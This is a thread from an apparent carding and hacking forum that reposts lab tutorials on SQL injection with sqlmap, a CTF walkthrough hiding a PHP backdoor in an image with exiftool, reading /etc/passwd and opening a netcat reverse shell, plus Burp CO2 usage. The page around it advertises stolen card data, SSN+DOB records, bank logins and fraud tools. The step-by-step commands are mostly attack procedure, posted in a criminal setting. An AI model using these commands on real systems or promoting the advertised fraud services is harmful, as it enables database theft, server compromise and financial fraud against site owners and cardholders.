Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis





PLACE YOUR TEXT HERE FOR ADVERTISE
PLACE YOUR TEXT HERE FOR ADVERTISE
CC+CVV Private Base Wholesale & Retail | 200+ Countries | Rare BINs
Best CC Shop Daily Updates | 200+ Countries | High Quality | 24/7 Fast Support
BlackBet.cc Banks, Shops, Real Docs, SSN+DOB, PayPal, GVoice/Gmail, Lookups






BlackHat CARDING FORUM

Not a member yet? Why not Sign up today
Login to account Create an account  




>PLACE TEXT ADVERTISING HERE< &PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE<





Announcement : Black Hat Forum is one of the Best Black Hat Carding Forum welcome you. We will share great stuff for our loved members, hope you enjoy your stay on our Black Hat Forum and you will return to us EVERYDAY. Stay Safe Enjoy Blackhat Carding Forum.

> > > >

  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


Thread tools
[Guide] Easy way to Hack Database using Wizard switch in Sqlmap
Offline
Most Active Person
****
Posts: 161
Threads: 161
Joined: Apr 2020
Reputation: 0
Points: 2€


#1
04-26-2020, 09:14 AM
0
0
Sqlmap provides wizard options for beginner and saves you much time. So start your Kali Linux and open the terminal and now the following command to use wizard interface of sqlmap.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
1
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
Type 1 for normal; to select the injection difficulty. Now again type 1 for basic enumeration.
[Image: 1.png?w=687&ssl=1]
It will automatically dump the basic detail of the backend server. Here you can see from the given screenshot it is shown that web application technology is nginx, PHP 5.3.10 and the operating system is Linux Ubuntu and many more things.
[Image: 2.png?w=687&ssl=1]
Now change level for penetration testing of the web with the sqlmap wizard. Again type the same command.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
1
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
Type 2 for medium; to select the injection difficulty. Now again type 2 for intermediate enumeration.
[Image: 3.png?w=687&ssl=1]
Wonderful!!! We have got a database name and all table names with columns.
[Image: 4.png?w=687&ssl=1]
Now again change level for penetration testing of the web with the sqlmap wizard. Repeat the same command.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
1
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
Type 3 for hard; to select the injection difficulty. Now again type 3 for All enumeration.
[Image: 5.png?w=687&ssl=1]
Awesome within three steps we have got entire information of acurat database. You can see the result from the screenshot.
[Image: 6.png?w=687&ssl=1]
Here we have all tables with its field details and column details.
[Image: 7.png?w=687&ssl=1]

Hello friends!! Today we are going to solve another CTF challenge “From SQL injection to Shell II” and you can read part 1 from

[To see content please register here]

. This VM is developed by Pentester Lab. You can download it from here:

[To see content please register here]


Install the iso image in VM ware and start it. The task given in this lab is to gain access to administration console and upload PHP webshell.
Level: Intermediate
Penetrating Methodologies
  • Network Scanning (Nmap)
  • Vulnerable to Blind Time-Base SQL Injection
  • Exploiting SQL Injection (SQLMAP)
  • Hiding web shell inside Image (ExifTool)
  • Uploading Web shell
  • Spawning Shell (Netcat)
Walkthrough
The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.
nmap -A 192.168.1.102
1
nmap -A 192.168.1.102
[Image: 2.png?w=687&ssl=1]
Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on the test.
[Image: 3.png?w=687&ssl=1]
The given URL:

[To see content please register here]

will run SQL query for ID 1 now let try to find out whether the above URL is vulnerable to SQL injection or not by adding(‘) apostrophe at last of URL:
Unfortunately, this page is not vulnerable to error based SQL injection as the author already mentioned here you will learn “Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell”
[Image: 4.png?w=687&ssl=1]
Then I had used acunetix to scan the target which has declared the level of threat is high for blind SQL injection.
Hence it is clear that exploit the target through SQL injection.
[Image: 5.1.png?w=687&ssl=1]
And after little more research work, I found the way to exploit it using sqlmap.
sqlmap -u

[To see content please register here]

--headers=”X-Forwarded-For: *” --dbs --dump-all --batch
1
sqlmap -u

[To see content please register here]

--headers=”X-Forwarded-For: *” --dbs --dump-all --batch
If you remembered the title of the web page was “An Awesome Photoblog” hence name of the database must be a photoblog.
[Image: 5.png?w=687&ssl=1]
Now let’s fetch entire data under photoblog database through the following command:
sqlmap -u

[To see content please register here]

--headers=”X-Forwarded-For: *” -D photoblog --dump-all --batch
1
sqlmap -u

[To see content please register here]

--headers=”X-Forwarded-For: *” -D photoblog --dump-all --batch
[Image: 6.png?w=687&ssl=1]
Now try to use above credential to access administration console, again open target IP: 192.168.1.102 in the browser and click on login tab and type login as admin and password as P4ssw0rd.
Congrats!!! The first task is completed.
Now the last task is to upload PHP webshell. Under administration console, you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload an image.
[Image: 7.png?w=687&ssl=1]
I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.
[Image: 8.png?w=687&ssl=1]
Then I use ExifTool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image “1.png” and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.
[Image: 9.png?w=687&ssl=1]
Now type command for ExifTool to hide malicious code of php file inside the png image.
cd Desktop
exiftool "-comment<= simple-backdoor.php" 1.png
exiftool 1.png
1
2
3
cd Desktop
exiftool "-comment<= simple-backdoor.php" 1.png
exiftool 1.png
As you can observe, the malicious code is hidden inside the image.
[Image: 10.png?w=687&ssl=1]
Now I had browse 1.png to add it as a new image which is our php webshell.
[Image: 11.png?w=687&ssl=1]
Our malicious file successfully uploaded on the web server. You can see a new row is added as webshell php which contains our php backdoor, now click on the backdoor.
[Image: 12.png?w=687&ssl=1]
Yuppie we have uploaded the image with hidden backdoor inside, now try to execute it.
[Image: 13.png?w=687&ssl=1]
After inspecting its source code we found link uploaded image, now let’s try to open it.
[Image: 14.png?w=687&ssl=1]
As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.

[To see content please register here]


1

[To see content please register here]


And you can observe, we have successfully pulled the passwd file successfully, hence now can spawn victim’s shell through it.
[Image: 15.png?w=687&ssl=1]
Let’s run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.
nc -lvp 6666

[To see content please register here]

192.168.1.105 6666 -e /bin/sh
1
2
nc -lvp 6666

[To see content please register here]

192.168.1.105 6666 -e /bin/sh
[Image: 16.png?w=687&ssl=1]
Superb!!! We completed our last challenge also here we have spawned victim web shell.
[Image: 17.png?w=687&ssl=1]

In this article, we are going to perform a SQL injection attack on multiple targets through sqlmap. I had used two buggy web dvwa and Acurat (vulweb.com).
Start dvwa and select SQL injection vulnerability here type user ID and click on submit, now copy the URL.
[Image: 1.png?w=687&ssl=1]
Start kali Linux then create a text file as sql.txt on the desktop which will contain URL for multiple target and past copied URL in a text file. From the screenshot, you can perceive that I had pasted above URL in this text file and save as sql.txt
[Image: 2.png?w=687&ssl=1]
Repeat the same process with different web. Now open the vulnweb.com, here click on URL given for Acuart.
[Image: 3.png?w=687&ssl=1]
Now click on browse categories then click on the poster
[Image: 4.png?w=687&ssl=1]
Now let verify whether the ID is vulnerable to SQL injection or not. Use this apostrophe () at the end of URL as shown in the screenshot. You can see I have received an error message which means the ID is vulnerable to SQL injection. Copy its URL
[Image: 4.png?w=687&ssl=1]
Paste above-copied URL under sql.txt, and save it again. So here I have saved two URL in a text file which means two vulnerable ID of the different web is saved under sql.txt file.
[Image: 6.png?w=687&ssl=1]
Open the terminal and type following command to scan multiple targets through sqlmap for SQL injection.
sqlmap –m /root/Desktop/sql.txt –dbs --batch
1
sqlmap –m /root/Desktop/sql.txt –dbs --batch
[Image: 7.png?w=687&ssl=1]
So here you can see I have got database names for multiple targets. Here I found dvwa under database names.
[Image: 8.png?w=687&ssl=1]
Later I have got another database name acurat. Now try yourself for multiple ID.
[Image: 9.png?w=687&ssl=1]

Burp CO2 is an extension for the popular web proxy/web application testing tool called Burp Suite, available at Portswigger. You must install Burp Suite before installing the Burp CO2 extension. The CO2 extension includes a variety of functionality to enhance certain web penetration test tasks, such as an interface to make interacting with SQLMap more efficient and less error-prone, various tools for generating lists of users, a Laudanum exploitation shell implementation, and even a word masher for generating passwords.
For more details read from here burpco2.com
In this is an article I will show you how to obtain sqlmap command through burp suit for SQL injection.
Start burp suit and click on Extender tag then click on BApp store which contains burp extensions to extend burp’s capabilities.
Now select CO2 and click on install button available on the right side of the frame.
[Image: 1.png?w=687&ssl=1]
From the given screenshot you can see the extension CO2 has added on menu bar now click on CO2 and then choose SQLMapper tool.
[Image: 2.1.png?w=687&ssl=1]
Now open the DVWA in your pc and log in with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level low
From the list of vulnerability select SQL Injection for your attack. Type user ID: ‘in the text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.
[Image: 2.png?w=687&ssl=1]
Go to burp suite click on the proxy in the menu bar and go for intercept is on the button. Come back and click on submit button in dvwa. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers.
Now right click on its window and you will see a list of many actions will have been opened then select option send to SQLMapper.
[Image: 3.png?w=687&ssl=1]
When the fetched data will be sent to SQL mapper it will automatically itself generates sqlmap command using referrer and cookie.
[Image: 4.png?w=687&ssl=1]
Here you can see the options box at the end of burp suite frame. Now click on enumeration tag and select the checkboxes for database, tables, columns, users, and passwords.
Now copy the sqlmap command from the text field and run this command manually on terminal using sqlmap.
[Image: 5.png?w=687&ssl=1]
Open the terminal and paste above command in front of “sqlmap” as shown in the screenshot. Now run this command to fetch information of the database.
[Image: 6.png?w=687&ssl=1]
From this tutorial, it is clear how to generate sqlmap command through burp suit for SQL injection. Now from the last image, you can see it starts dumping the data.
[Image: 7.png?w=687&ssl=1]
Find Rate
Reply







Users browsing this thread:
1 Guest(s)

 


Blackhat Carding forum


Search keywords: the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs,carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, WebMoney carding, card clone, the best hacking country, india hackers team, alboraaq , pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, x'xx passwords, WebMoney hacking, abh cc live, fresh smtp, hacking forum scam free smtp, wmz carding , spam paypal, caring, true carders, carding board, what is the best hacking forum, www.hackingforum.ru, www.carderscave.ru, www.darkgeo.com, www.darkgeo.su, www.darkgeo.ru, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer only for real hackers, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com. Carding forum, Carders Forum, Hacking Forum, Hackers Forum, Cheap WU Transfer, CCV Dumps, Legit Carders 2020, ATN Team, Altenen, Hacking Tutorials, Free Premium Porn Accounts, Carding Tools 2020, Fraud Carding, Fraudsters Marketplace, Carding Forum Scam, Inbox Spamming, Free Mailer PHP, Free VPN 2020, Best VPN 2020, AlphaBay Market, Free Fresh Mail Leads, Real Hacker Forum, Alboraaq Review, Alboraaq Hackers, Perfect Money Stealer, Darknet Forums, Darknet Hackers, Darknet Carders, Cardable Websites 2020, Buy Credit Card Dumps, Western Union Generator, Money Gram Transfers Cheap, Free CVV, Free RDP, Cheap RDP, Amazon Carding 2020, NonVBV Cardable Websites, TOR VPN 2020, Russian Carding Forum, UK Carding Forums, Bitcoin Wallet Stealer, Bitcoin Carding, Bank Stealer, Hacked Bank Logins, Bank Logins, Free Keyloggers 2020, Best Keylogger Download, Free Receipt Generator, Card Bitcoins easy, Amazon method, Best Pakistan Carders, Dumps Section, Legit Carding, Unseen, Tutamail, Deepdotweb, CC Live, Free premium logs, iPhone 6s Carded, Cheap Electronics Carding, Black Marketplace, Cheap Bank Transfers, Carding Tools, Havij Hacking, India Hackers, Cheap Apple Carding 2020, PayPal Dumps Logs, Market Hackers, Fresh email logs, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs, carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, hacking stuff, card clone, the best hacking country, india hackers team, alboraaq scamming, pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, xxx passwords, xxx username and passwords, abh cc live, fresh smtp, hacking forum scam free smtp, ams spamming, spam paypal, caring, true carders, carding board, what is the best hacking forum, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com, altenen, altenen.com, alboraaq, alboraaq.com